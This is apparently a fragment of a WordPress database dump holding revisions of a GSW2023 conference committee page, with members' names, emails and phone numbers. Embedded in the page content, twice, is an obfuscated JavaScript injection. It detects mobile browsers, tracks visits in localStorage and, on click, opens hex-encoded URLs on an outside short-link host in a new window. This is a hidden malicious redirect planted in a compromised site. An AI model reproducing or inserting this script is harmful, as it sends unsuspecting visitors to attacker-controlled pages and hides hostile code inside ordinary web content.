)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:14:04','2023-06-28 09:14:04','',4849,'https://gsw2023.com/?p=4942',0,'revision','',0),
(4943,4,'2023-06-28 09:14:54','2023-06-28 09:14:54','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687943689254{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687873508355{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687873468324{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 